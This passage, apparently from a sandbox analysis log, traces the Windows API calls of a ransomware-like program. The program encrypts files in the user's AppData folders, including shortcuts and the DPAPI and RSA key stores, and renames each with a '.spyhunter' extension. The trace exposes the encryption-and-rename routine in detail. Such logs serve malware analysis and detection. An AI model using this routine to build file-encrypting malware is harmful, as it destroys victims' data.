lpOverlapped=0x0) returned 1 [0140.404] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffffede, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.404] WriteFile (in: hFile=0x184, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x248f44c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f44c*=0x122, lpOverlapped=0x0) returned 1 [0140.405] GetProcessHeap () returned 0x2c0000 [0140.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0140.405] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.405] WriteFile (in: hFile=0x184, lpBuffer=0x248f48c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f44c, lpOverlapped=0x0 | out: lpBuffer=0x248f48c*, lpNumberOfBytesWritten=0x248f44c*=0x4, lpOverlapped=0x0) returned 1 [0140.405] WriteFile (in: hFile=0x184, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f44c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f44c*=0x30, lpOverlapped=0x0) returned 1 [0140.405] CloseHandle (hObject=0x184) returned 1 [0140.405] GetProcessHeap () returned 0x2c0000 [0140.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0140.405] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.spyhunter") returned 118 [0140.405] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk.spyhunter")) returned 1 [0140.411] GetProcessHeap () returned 0x2c0000 [0140.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0140.411] GetProcessHeap () returned 0x2c0000 [0140.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.411] GetProcessHeap () returned 0x2c0000 [0140.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc0990 | out: hHeap=0x2c0000) returned 1 [0140.411] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f490 | out: pbBuffer=0x248f490) returned 1 [0140.411] GetProcessHeap () returned 0x2c0000 [0140.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.411] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f488*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f488*=0x30) returned 1 [0140.411] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\google chrome.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0140.412] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk") returned 108 [0140.412] StrStrW (lpFirst="Google Chrome.lnk", lpSrch=".txt") returned 0x0 [0140.412] GetProcessHeap () returned 0x2c0000 [0140.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.412] ReadFile (in: hFile=0x184, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f44c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f44c*=0x8e9, lpOverlapped=0x0) returned 1 [0140.460] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffff717, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.460] WriteFile (in: hFile=0x184, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x8e9, lpNumberOfBytesWritten=0x248f44c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f44c*=0x8e9, lpOverlapped=0x0) returned 1 [0140.461] GetProcessHeap () returned 0x2c0000 [0140.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0140.461] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.461] WriteFile (in: hFile=0x184, lpBuffer=0x248f48c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f44c, lpOverlapped=0x0 | out: lpBuffer=0x248f48c*, lpNumberOfBytesWritten=0x248f44c*=0x4, lpOverlapped=0x0) returned 1 [0140.461] WriteFile (in: hFile=0x184, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f44c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f44c*=0x30, lpOverlapped=0x0) returned 1 [0140.461] CloseHandle (hObject=0x184) returned 1 [0140.461] GetProcessHeap () returned 0x2c0000 [0140.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0140.461] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk.spyhunter") returned 118 [0140.461] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\google chrome.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\google chrome.lnk.spyhunter")) returned 1 [0140.462] GetProcessHeap () returned 0x2c0000 [0140.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0140.462] GetProcessHeap () returned 0x2c0000 [0140.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.463] GetProcessHeap () returned 0x2c0000 [0140.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc0868 | out: hHeap=0x2c0000) returned 1 [0140.464] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f488 | out: pbBuffer=0x248f488) returned 1 [0140.464] GetProcessHeap () returned 0x2c0000 [0140.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.464] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f480*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f480*=0x30) returned 1 [0140.464] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0140.579] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 187 [0140.579] StrStrW (lpFirst="932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".txt") returned 0x0 [0140.579] GetProcessHeap () returned 0x2c0000 [0140.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.579] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f444, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f444*=0x57, lpOverlapped=0x0) returned 1 [0140.580] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffa9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.580] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x57, lpNumberOfBytesWritten=0x248f444, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f444*=0x57, lpOverlapped=0x0) returned 1 [0140.580] GetProcessHeap () returned 0x2c0000 [0140.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0140.580] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.581] WriteFile (in: hFile=0x178, lpBuffer=0x248f484*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f444, lpOverlapped=0x0 | out: lpBuffer=0x248f484*, lpNumberOfBytesWritten=0x248f444*=0x4, lpOverlapped=0x0) returned 1 [0140.581] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f444, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f444*=0x30, lpOverlapped=0x0) returned 1 [0140.581] CloseHandle (hObject=0x178) returned 1 [0140.581] GetProcessHeap () returned 0x2c0000 [0140.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.581] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.spyhunter") returned 197 [0140.581] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.spyhunter")) returned 1 [0140.582] GetProcessHeap () returned 0x2c0000 [0140.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.582] GetProcessHeap () returned 0x2c0000 [0140.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.583] GetProcessHeap () returned 0x2c0000 [0140.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e180d8 | out: hHeap=0x2c0000) returned 1 [0140.583] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f488 | out: pbBuffer=0x248f488) returned 1 [0140.583] GetProcessHeap () returned 0x2c0000 [0140.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.583] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f480*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f480*=0x30) returned 1 [0140.583] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\synchist"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0140.623] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned 76 [0140.623] StrStrW (lpFirst="SYNCHIST", lpSrch=".txt") returned 0x0 [0140.623] GetProcessHeap () returned 0x2c0000 [0140.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.623] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f444, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f444*=0x4c, lpOverlapped=0x0) returned 1 [0140.624] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.624] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x248f444, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f444*=0x4c, lpOverlapped=0x0) returned 1 [0140.624] GetProcessHeap () returned 0x2c0000 [0140.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0140.624] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.625] WriteFile (in: hFile=0x178, lpBuffer=0x248f484*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f444, lpOverlapped=0x0 | out: lpBuffer=0x248f484*, lpNumberOfBytesWritten=0x248f444*=0x4, lpOverlapped=0x0) returned 1 [0140.625] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f444, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f444*=0x30, lpOverlapped=0x0) returned 1 [0140.625] CloseHandle (hObject=0x178) returned 1 [0140.625] GetProcessHeap () returned 0x2c0000 [0140.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.625] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST.spyhunter") returned 86 [0140.625] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\synchist"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\synchist.spyhunter")) returned 1 [0140.626] GetProcessHeap () returned 0x2c0000 [0140.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.627] GetProcessHeap () returned 0x2c0000 [0140.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.627] GetProcessHeap () returned 0x2c0000 [0140.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2f130 | out: hHeap=0x2c0000) returned 1 [0140.627] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f480 | out: pbBuffer=0x248f480) returned 1 [0140.627] GetProcessHeap () returned 0x2c0000 [0140.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.627] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f478*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f478*=0x30) returned 1 [0140.627] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0140.643] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c") returned 151 [0140.643] StrStrW (lpFirst="02540a10-7eb7-4b20-a8c7-470f8986389c", lpSrch=".txt") returned 0x0 [0140.643] GetProcessHeap () returned 0x2c0000 [0140.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.643] ReadFile (in: hFile=0xf0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f43c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f43c*=0x1d4, lpOverlapped=0x0) returned 1 [0140.644] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0140.644] WriteFile (in: hFile=0xf0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x248f43c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f43c*=0x1d4, lpOverlapped=0x0) returned 1 [0140.644] GetProcessHeap () returned 0x2c0000 [0140.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0140.644] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0140.644] WriteFile (in: hFile=0xf0, lpBuffer=0x248f47c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f43c, lpOverlapped=0x0 | out: lpBuffer=0x248f47c*, lpNumberOfBytesWritten=0x248f43c*=0x4, lpOverlapped=0x0) returned 1 [0140.644] WriteFile (in: hFile=0xf0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f43c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f43c*=0x30, lpOverlapped=0x0) returned 1 [0140.644] CloseHandle (hObject=0xf0) returned 1 [0140.644] GetProcessHeap () returned 0x2c0000 [0140.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ff5a50 [0140.645] wnsprintfW (in: pszDest=0x2ff5a50, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c.spyhunter") returned 161 [0140.645] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c.spyhunter")) returned 1 [0140.646] GetProcessHeap () returned 0x2c0000 [0140.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5a50 | out: hHeap=0x2c0000) returned 1 [0140.646] GetProcessHeap () returned 0x2c0000 [0140.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.646] GetProcessHeap () returned 0x2c0000 [0140.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a20a8 | out: hHeap=0x2c0000) returned 1 [0140.647] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f478 | out: pbBuffer=0x248f478) returned 1 [0140.647] GetProcessHeap () returned 0x2c0000 [0140.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.647] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f470*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f470*=0x30) returned 1 [0140.647] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.647] GetProcessHeap () returned 0x2c0000 [0140.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.648] GetProcessHeap () returned 0x2c0000 [0140.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe9130 | out: hHeap=0x2c0000) returned 1 [0140.648] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f478 | out: pbBuffer=0x248f478) returned 1 [0140.648] GetProcessHeap () returned 0x2c0000 [0140.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.648] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f470*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f470*=0x30) returned 1 [0140.648] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.648] GetProcessHeap () returned 0x2c0000 [0140.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0140.648] GetProcessHeap () returned 0x2c0000 [0140.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe8ff8 | out: hHeap=0x2c0000) returned 1 [0140.651] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f470 | out: pbBuffer=0x248f470) returned 1 [0140.651] GetProcessHeap () returned 0x2c0000 [0140.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0140.651] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f468*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f468*=0x30) returned 1 [0140.651] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0140.651] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred") returned 123 [0140.651] StrStrW (lpFirst="Preferred", lpSrch=".txt") returned 0x0 [0140.652] GetProcessHeap () returned 0x2c0000 [0140.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0140.652] ReadFile (in: hFile=0xf0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f42c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f42c*=0x18, lpOverlapped=0x0) returned 1 [0140.652] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffffe8, 